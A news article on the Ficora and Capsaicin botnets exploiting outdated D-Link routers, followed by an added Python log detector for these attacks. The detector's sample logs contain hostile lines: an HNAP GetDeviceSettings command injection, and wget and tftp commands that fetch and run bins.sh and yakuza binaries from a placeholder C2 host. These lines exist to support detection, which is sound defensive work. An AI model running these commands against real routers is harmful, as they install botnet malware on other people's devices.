Malware botnets abuse outdated D-Link routers

Two botnets, known as “Ficora” and “Capsaicin,” stepped up their activities to attack D-Link routers that are end-of-life or running on outdated firmware.

The attacks target popular D-Link models such as DIR-645, DIR-806, GO-RT-AC750, and DIR-845L. These devices are commonly used by individuals and organizations.

The malware exploits known vulnerabilities, such as CVE-2015-2051, CVE-2019-10891, CVE-2022-37056, and CVE-2024-33112, among others, to gain initial access to the targeted devices. Once a device is compromised, attackers abuse weaknesses in the D-Link Management Interface (HNAP) and execute malicious commands via the GetDeviceSettings action.

These botnets can steal data and execute shell scripts. Criminals often deploy the botnets for large-scale Distributed Denial-of-Service (DDoS) attacks.

New variant of Mirai botnet

Ficora is a new variant of the infamous Mirai botnet, specifically modified to exploit weaknesses in D-Link devices.

According to Fortinet data, Ficora shows no regular attack pattern, with spikes in activity in October and November. After gaining access, Ficora uses a shell script, "multi", to download and execute the payload via wget, curl, ftpget and tftp.

The malware includes a built-in brute force component with hard-coded login credentials to infect other Linux devices and supports multiple hardware architectures. Ficora uses UDP flooding, TCP flooding, and DNS amplification for its DDoS attacks.

Infection begins with download script

Capsaicin, a variant of the Kaiten botnet, is attributed to the Keksec group, which is known for malware such as EnemyBot. This botnet was active between Oct. 21 and 22 and mainly targeted East Asian countries.

The infection begins with a download script called “bins.sh,” which retrieves executable files (with the prefix ‘yakuza’) for architectures such as arm, mips, sparc and x86. Capsaicin is designed to identify and disable other active botnet payloads on the same host. In addition to its DDoS functionality, the botnet collects host information and sends it to the command-and-control (C2) server.
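As an added illustration (not from the article or from Fortinet's analysis), the following Python detector scans constructed router HTTP and shell log lines for the two stages described above: an HNAP GetDeviceSettings request carrying shell metacharacters, and a downloader that invokes wget, curl, ftpget or tftp to fetch bins.sh or a yakuza-prefixed binary. The log format, client addresses and the host c2.invalid are assumptions.

```python
import re

# Constructed sample log lines (not taken from the article or any real device);
# 192.0.2.x / 198.51.100.x addresses and "c2.invalid" are placeholders.
SAMPLE_LOGS = [
    '192.0.2.10 "POST /HNAP1/ HTTP/1.1" SOAPAction="http://purenetworks.com/HNAP1/GetDeviceSettings"',
    '192.0.2.11 "POST /HNAP1/ HTTP/1.1" SOAPAction="http://purenetworks.com/HNAP1/GetDeviceSettings/`wget http://c2.invalid/bins.sh`"',
    'sh: wget http://c2.invalid/bins.sh -O /tmp/bins.sh; chmod +x /tmp/bins.sh; /tmp/bins.sh',
    'sh: tftp -g -r yakuza.mips 198.51.100.7',
    'sh: curl -s https://updates.example.com/firmware.bin',
]

# SOAPAction header naming GetDeviceSettings; group(1) is whatever follows the action name.
HNAP_ACTION = re.compile(r'SOAPAction="[^"]*GetDeviceSettings([^"]*)"')
# Shell metacharacters that have no business inside an HNAP action name.
SHELL_META = re.compile(r'[;|`&]|\$\(')
# Fetch tools the article lists for the downloader stage.
FETCHER = re.compile(r'\b(wget|curl|ftpget|tftp)\b')
# Payload names the article lists: the bins.sh script and yakuza-prefixed binaries.
PAYLOAD_NAME = re.compile(r'\b(bins\.sh|yakuza\.\w+)\b')


def classify(line):
    """Return the finding tags for one log line (empty list if benign)."""
    tags = []
    m = HNAP_ACTION.search(line)
    # A plain GetDeviceSettings call is normal; only flag it when the action
    # name is followed by shell metacharacters (command-injection shape).
    if m and SHELL_META.search(m.group(1)):
        tags.append("hnap_getdevicesettings_injection")
    # A fetch tool alone is noise (firmware updates use curl too); require a
    # known botnet payload name on the same line.
    if FETCHER.search(line) and PAYLOAD_NAME.search(line):
        tags.append("botnet_downloader")
    return tags


def scan(lines):
    """Map line index -> tags for every line that produced a finding."""
    findings = {}
    for i, line in enumerate(lines):
        tags = classify(line)
        if tags:
            findings[i] = tags
    return findings


if __name__ == "__main__":
    for idx, tags in scan(SAMPLE_LOGS).items():
        print(idx, tags, SAMPLE_LOGS[idx])
```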
